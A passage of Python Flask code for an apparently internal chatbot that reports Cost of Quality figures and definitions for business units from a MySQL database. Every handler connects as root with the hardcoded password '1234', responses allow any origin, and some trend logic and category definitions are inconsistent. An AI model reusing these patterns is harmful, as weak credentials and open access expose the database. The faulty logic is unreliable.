app = request.args.get('app');
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
cur.execute("SELECT round(GROUP_CONCAT(if(sorting = '', cost, NULL))*100,2),round(GROUP_CONCAT(if(sorting = '10', cost, NULL))*12/1000000,2),round(GROUP_CONCAT(if(sorting = '13', cost, NULL))/10000,2) FROM forboard where app=%s and yearmonth=201800 and sorting in ('','10','13')",(app))
for r in cur :
returnData['2018 '+app+'年度CoQ狀況']=''
returnData['Target']=str(r[0])+'%'
returnData['CoQ']=str(r[1])+'M (NTD)'
returnData['CoQ Rate']=str(r[2])+'%'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,None,'Q016',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q017" : # 17. Q017 BU月圖
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
yearmonth = cur.fetchone()[0];
returnData = OrderedDict();
returnData[' '+str(yearmonth)+' '+app+'BU月圖']=''
if app == '所有應用':
cur.execute("SELECT IFNULL(a5,0)+IFNULL(a6,0)+IFNULL(a7,0)+IFNULL(a8,0) FROM accumulation where app='所有應用' and yearmonth=%s",(yearmonth))
elif app == 'MD BU':
cur.execute("SELECT IFNULL(a4,0)+IFNULL(a5,0)+IFNULL(a6,0) FROM accumulation where app='MD BU' and yearmonth=%s",(yearmonth))
elif app == 'TV BU':
cur.execute("SELECT IFNULL(a3,0)+IFNULL(a4,0) FROM accumulation where app='TV BU' and yearmonth=%s",(yearmonth))
elif app == 'ITI BU':
cur.execute("SELECT IFNULL(a4,0)+IFNULL(a5,0)+IFNULL(a6,0) FROM accumulation where app='ITI BU' and yearmonth=%s",(yearmonth))
elif app == 'AA BU':
cur.execute("SELECT IFNULL(a3,0)+IFNULL(a4,0) FROM accumulation where app='AA BU' and yearmonth=%s",(yearmonth))
else :
cur.execute("SELECT IFNULL(a8,0)+IFNULL(a9,0)+IFNULL(a10,0)+IFNULL(a11,0) FROM accumulation where app=%s and yearmonth=%s",(app,yearmonth))
accumulationValue = cur.fetchone()[0];
returnData['1. 截至'+str(yearmonth)+'累計CoQ目標'] = str(round(accumulationValue/1000000,1))+'M (NTD)'
cur.execute('SELECT output1,output2,output3,output4,output5,output6 FROM remainCoQ where yearmonth = %s and application = %s',(yearmonth,app))
for r in cur :
returnData['2. 截至'+str(yearmonth)+'累計已支出CoQ'] = str(round(r[1]/1000000,1))+'M (NTD)'
returnData['3. 年底達標預計可支出總CoQ'] = str(round(r[0]/1000000,1))+'M (NTD)'
returnData['4. 年剩餘額度'] = str(round(r[2]/1000000,1))+'M (NTD)'
returnData['5. 年剩餘可控額度'] = str(round(r[4]/1000000,1))+'M (NTD)'
returnData['6. 年平均CoQ Rate'] = str(round(r[3]*100,2))+'%'
returnData['7. 年供應商賠償總額'] = str(round(r[5]/1000000,1))+'M (NTD)'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q017',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q035" : # 35. CoQ是什麼
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['CoQ(Cost of Quality)']='指為了提高和保證產品品質而支出的一切費用,以及因產品品質未達到規定的要求而造成的一切損失的總和。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q035',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q036" : # 36. CoQ rate怎麼算
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['CoQ Rate']='Σ(預防+鑑定+內失+外失)成本 / 營收'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q036',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q037" : # 37. 預防成本是什麼
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['學術定義']='用於避免生產出不良品而投入的成本。'
returnData['資料定義']='DQ/SQ/MQ/QS的十大費用(排除直接人事費用)。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q037',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q038" : # 38. 鑑定成本是什麼
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['學術定義']='檢驗產品是否符合標準的成本。'
returnData['資料定義']='DQ/SQ/MQ/QS的十大費用(排除直接人事費用)。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q038',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q039" : # 39. 外失成本是什麼
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['學術定義']='產品運交至顧客後,因未能達到品質要求而造成的損失。'
returnData['資料定義']='MQ/SQ的部份間接人事費用<br>產品於廠內執行報廢/重工/降等所產生的費用。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q039',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q040" : # 40. 內失成本是什麼
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['學術定義']='產品運交至顧客前,因未能達到品質要求而造成的損失。'
returnData['資料定義']='1.RMA返品的維修、報廢、OBA/SORTING、賠償...等相關費用。<br>2.因品質問題導致營收減少的費用。<br>3.外失-其它:CQ/RMA的十大費用(排除營運費用)。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q040',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q041" : # 41. 外失售保是什麼
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['資料定義']='RMA管理帳的費用。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q041',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q042" : # 42. 內失AERB是什麼
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['資料定義']='廠內有標誌AERB,至降等或報廢的PANEL。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q042',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q043" : # 43. 外失Rebate是什麼
Chat_ID = request.args.get('Chat_ID')
returnData = OrderedDict();
returnData['資料定義']='CQE 客戶要求rebate的費用。'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat('',None,'Q043',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q048" : # 48. Q048 EXP 20200131
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
cur.execute('SELECT round(100*(IFNULL(GROUP_CONCAT(if(sorting = "01", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "02", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "03", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "04", cost, NULL)),0))/sum(cost),2) FROM forboard WHERE yearmonth = %s and app=%s and sorting in ("01","02","03","04","05","06","07") group by yearmonth',(yearmonth,app))
EXPRate = cur.fetchone()[0];
returnData = OrderedDict();
if yearmonth % 100 == 0 :
yearmonthTmp = str(yearmonth//100)+'全年'
else :
yearmonthTmp = str(yearmonth)
returnData[yearmonthTmp+' '+app+' EXP佔比'] = str(EXPRate)+'%'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q048',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
elif answerNo == "Q049" : # 49. Q049 CoPQ 20200131
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
cur.execute('SELECT round(100*(IFNULL(GROUP_CONCAT(if(sorting = "05", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "06", cost, NULL)),0)+IFNULL(GROUP_CONCAT(if(sorting = "07", cost, NULL)),0))/sum(cost),2) FROM forboard WHERE yearmonth = %s and app=%s and sorting in ("01","02","03","04","05","06","07") group by yearmonth',(yearmonth,app))
CoPQRate = cur.fetchone()[0];
returnData = OrderedDict();
if yearmonth % 100 == 0 :
yearmonthTmp = str(yearmonth//100)+'全年'
else :
yearmonthTmp = str(yearmonth)
returnData[yearmonthTmp+' '+app+' CoPQ佔比'] = str(CoPQRate)+'%'
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q049',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 1. Q001 CoQ現況
@app.route("/Q001", methods=['GET'])
def Q001():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
print(app,' ',yearmonth,' ',Chat_ID)
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = int(cur.fetchone()[0]);
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
# CoQ總計(含供應商求償)(百萬元) sorting = '10'
cur.execute("SELECT cost FROM forboard where app=%s and yearmonth=%s and sorting = '10'",(app,yearmonth));
returnData[' (1) '+str(yearmonth)+app+ 'CoQ總計(含供應商求償)'] = str(round(cur.fetchone()[0]/1000000, 2))+'M (NTD)';
############## 原本Q002
# CoQ總計佔營收比 sorting = '12'
ans = '未達標'
cur.execute("select GROUP_CONCAT(if(sorting = '12', cost , NULL))- GROUP_CONCAT(if(sorting = '', cost*1000000, NULL)) from forboard WHERE sorting in ('12','') and app=%s and yearmonth=%s",(app,yearmonth));
if int(cur.fetchone()[0]) <= 0 :
ans = '達標';
returnData[' (5) CoQ Rate 趨勢'] = ans;
if yearmonth%100 == 1:
yearmonth2 = yearmonth -100 +11
else :
yearmonth2 = yearmonth -1
print(yearmonth,' ',yearmonth2)
cur.execute("select GROUP_CONCAT(if(yearmonth = %s, cost, NULL)),GROUP_CONCAT(if(yearmonth = %s, cost, NULL)) from forboard WHERE sorting ='12' and app=%s and yearmonth in (%s,%s)",(yearmonth,yearmonth2,app,yearmonth2,yearmonth));
r = cur.fetchone()
print(r[0],' ',r[1])
rate = round(float(r[0])/10000,2)
rate2 = round( float(r[1]) /10000,2)
#returnData['CoQ Rate'] = str(rate)+'%';
ans = '改善'
if rate < rate2 :
ans = '改善'
elif rate > rate2 :
ans = '惡化'
if (rate - rate2)/rate2 <= 0.05 :
ans = '持平'
else :
ans = '持平'
returnData[' (6) 較上月'+ans] = str(abs(round(rate-rate2,2)))+'%';
############## 原本Q004
if yearmonth%100 == 1:
yearmonth2 = yearmonth -100 +11
else :
yearmonth2 = yearmonth -1
cur.execute("select GROUP_CONCAT(if(yearmonth = %s, cost, NULL)),GROUP_CONCAT(if(yearmonth = %s, cost, NULL)) from forboard WHERE sorting ='12' and app=%s and yearmonth in (%s,%s)",(yearmonth,yearmonth2,app,yearmonth2,yearmonth));
r = cur.fetchone()
rate = round(float(r[0])/10000,2)
rate2 = round(float(r[1])/10000,2)
#print(rate,' ',rate2)
#returnData['CoQ Rate'+str(yearmonth)+'現況'] = ' ';
returnData[' (2) '+str(yearmonth2)+' CoQ Rate'] = str(rate2)+'%';
returnData[' (3) '+str(yearmonth)+' CoQ Rate'] = str(rate)+'%';
############## 原本Q009
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting=''",(yearmonth,app))
returnData[' (4) CoQ Rate Target'] = str(round(float(cur.fetchone()[0])*100,2))+'%';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q001',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 2. Q002 CoQ / CoQ Rate 是否超標
@app.route("/Q002", methods=['GET'])
def Q002():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
# CoQ總計佔營收比 sorting = '12'
ans = '未達標'
cur.execute("select GROUP_CONCAT(if(sorting = '12', cost , NULL))- GROUP_CONCAT(if(sorting = '', cost*1000000, NULL)) from forboard WHERE sorting in ('12','') and app=%s and yearmonth=%s",(app,yearmonth));
if int(cur.fetchone()[0]) <= 0 :
ans = '達標';
returnData[' '+str(yearmonth)+' '+app+' CoQ Rate'+'趨勢'] = ans;
if yearmonth%100 == 1:
yearmonth2 = yearmonth -100 +11
else :
yearmonth2 = yearmonth -1
cur.execute("select GROUP_CONCAT(if(yearmonth = %s, cost, NULL)),GROUP_CONCAT(if(yearmonth = %s, cost, NULL)) from forboard WHERE sorting ='12' and app=%s and yearmonth in (%s,%s)",(yearmonth,yearmonth2,app,yearmonth2,yearmonth));
r = cur.fetchone()
rate = round(float(r[0])/10000,2)
rate2 = round(float(r[1])/10000,2)
returnData['CoQ Rate'] = str(rate)+'%';
ans = '改善'
if rate < rate2 :
ans = '改善'
elif rate > rate2 :
ans = '惡化'
if (rate - rate2)/rate2 <= 0.05 :
ans = '持平'
else :
ans = '持平'
returnData['較上月'+ans] = str(abs(round(rate-rate2,2)))+'%';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q002',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 3. Q003 CoQ 達標狀況(未達標應用別)
@app.route("/Q003", methods=['GET'])
def Q003():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
buList = ['ITI BU','AA BU','MD BU','TV BU']
appList = ['TV','SET_TV','AA-BD4','NB','MONITOR','IAVM','MP','CE','TABLET','AUTO-BD5']
# get Below standard
belowStandardApp = ''
if app == '所有應用' :
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target' and app <> %s and app not in ('AII BU','MD BU')) b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000",(yearmonth,app,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+r[0]+","
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
cur.execute("SELECT IFNULL(a4,0)+IFNULL(a5,0)+IFNULL(a6,0) FROM accumulation_new where app=%s and yearmonth=%s",(app,yearmonth))
accumulationValue = cur.fetchone()[0];
elif app == 'MD BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('MP','CE','Tablet')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+r[0]+","
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'ITI BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('NB','Monitor','IAVM')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+r[0]+","
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'AA BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('AA-BD4','AUTO-BD5')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+r[0]+","
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'TV BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('TV','SET_TV')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+r[0]+","
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
else :
belowStandardApp = "'"+app+"'"
if belowStandardApp == '' :
belowStandardApp = '都有達標'
returnData[str(yearmonth)+' '+app+' 未達標應用別'] = belowStandardApp;
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q003',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 4. Q004 CoQ Rate現況
@app.route("/Q004", methods=['GET'])
def Q004():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
#print(app,' ',yearmonth,' ',Chat_ID)
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
if yearmonth%100 == 1:
yearmonth2 = yearmonth -100 +11
else :
yearmonth2 = yearmonth -1
cur.execute("select GROUP_CONCAT(if(yearmonth = %s, cost, NULL)),GROUP_CONCAT(if(yearmonth = %s, cost, NULL)) from forboard WHERE sorting ='12' and app=%s and yearmonth in (%s,%s)",(yearmonth,yearmonth2,app,yearmonth2,yearmonth));
r = cur.fetchone()
rate = round(float(r[0])/10000,2)
rate2 = round(float(r[1])/10000,2)
#print(rate,' ',rate2)
#returnData['CoQ Rate'+str(yearmonth)+'現況'] = ' ';
returnData[' '+str(yearmonth)+' '+app+' CoQ Rate 現況<br>(1)'+str(yearmonth2)] = str(rate2)+'%';
returnData['(2)'+str(yearmonth)] = str(rate)+'%';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q004',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 5. Q005 預防成本是多少?
@app.route("/Q005", methods=['GET'])
def Q005():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='01'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 預防成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q005',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 6. Q006 鑑定成本是多少?
@app.route("/Q006", methods=['GET'])
def Q006():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='02'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 鑑定成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q006',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 7. Q007 外失成本是多少?
@app.route("/Q007", methods=['GET'])
def Q007():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select sum(cost) from forboard where yearmonth=%s and app=%s and sorting in ('04','05','06')",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 外失成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q007',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 8. Q008 內失成本是多少?
@app.route("/Q008", methods=['GET'])
def Q008():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='03'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 內失成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q008',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 9. Q009 CoQ rate target(目標)是多少
@app.route("/Q009", methods=['GET'])
def Q009():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting=''",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' Target'] = str(round(float(cur.fetchone()[0])*100,2))+'%';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q009',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# . Q010 外失售保成本是多少? sorting='05'
@app.route("/Q010", methods=['GET'])
def Q010():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='05'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 外失售保成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q010',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# . Q011 AERB內失成本是多少? sorting='07'
@app.route("/Q011", methods=['GET'])
def Q011():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select IFNULL(cost, 0) from forboard where yearmonth=%s and app=%s and sorting='07'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' AERB內失成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q011',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# . Q012 外失Rebate成本是多少? sorting='06'
@app.route("/Q012", methods=['GET'])
def Q012():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
cur.execute("select cost from forboard where yearmonth=%s and app=%s and sorting='06'",(yearmonth,app))
returnData[str(yearmonth)+' '+app+' 外失Rebate成本'] = str(round(float(cur.fetchone()[0])/1000000,3))+'M (NTD)';
answerText = json.dumps(returnData,ensure_ascii=False)
updateChat(app,yearmonth,'Q012',answerText,Chat_ID)
response = jsonify(returnData)
response.headers.add('Access-Control-Allow-Origin', '*')
return response
# 13. Q013 Top3 Model
@app.route("/Q013", methods=['GET'])
def Q013():
conn = pymysql.connect(host = host,port = port,user = 'root',passwd = "1234",db = 'coq')
cur = conn.cursor()
app = request.args.get('app');
yearmonth = int(request.args.get('yearmonth'));
Chat_ID = request.args.get('Chat_ID')
cur.execute("select max(yearmonth) from (SELECT yearmonth,count(1) c FROM forboard group by yearmonth ORDER by yearmonth) a where c>300")
maxYearmonth = cur.fetchone()[0];
if yearmonth == '' or yearmonth > maxYearmonth:
yearmonth = maxYearmonth
returnData = OrderedDict();
buList = ['ITI BU','AA BU','MD BU','TV BU']
appList = ['TV','SET_TV','AA-BD4','NB','MONITOR','IAVM','MP','CE','TABLET','AUTO-BD5']
# get Below standard
belowStandardApp = ''
if app == '所有應用' :
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target' and app <> %s and app not in ('AII BU','MD BU')) b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000",(yearmonth,app,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'MD BU':
cur.execute("SELECT a.app FROM forboard a join (select app ,cost from forboard where yearmonth = %s and coq_type = 'Target') b on a.app = b.app WHERE a.yearmonth = %s and a.sorting=12 and a.cost > b.cost*1000000 and a.app in ('MP','CE','Tablet')",(yearmonth,yearmonth))
if cur.rowcount > 0 :
for r in cur :
belowStandardApp = belowStandardApp+"'"+r[0]+"',"
belowStandardApp = belowStandardApp[0:len(belowStandardApp)-1]
elif app == 'ITI BU':
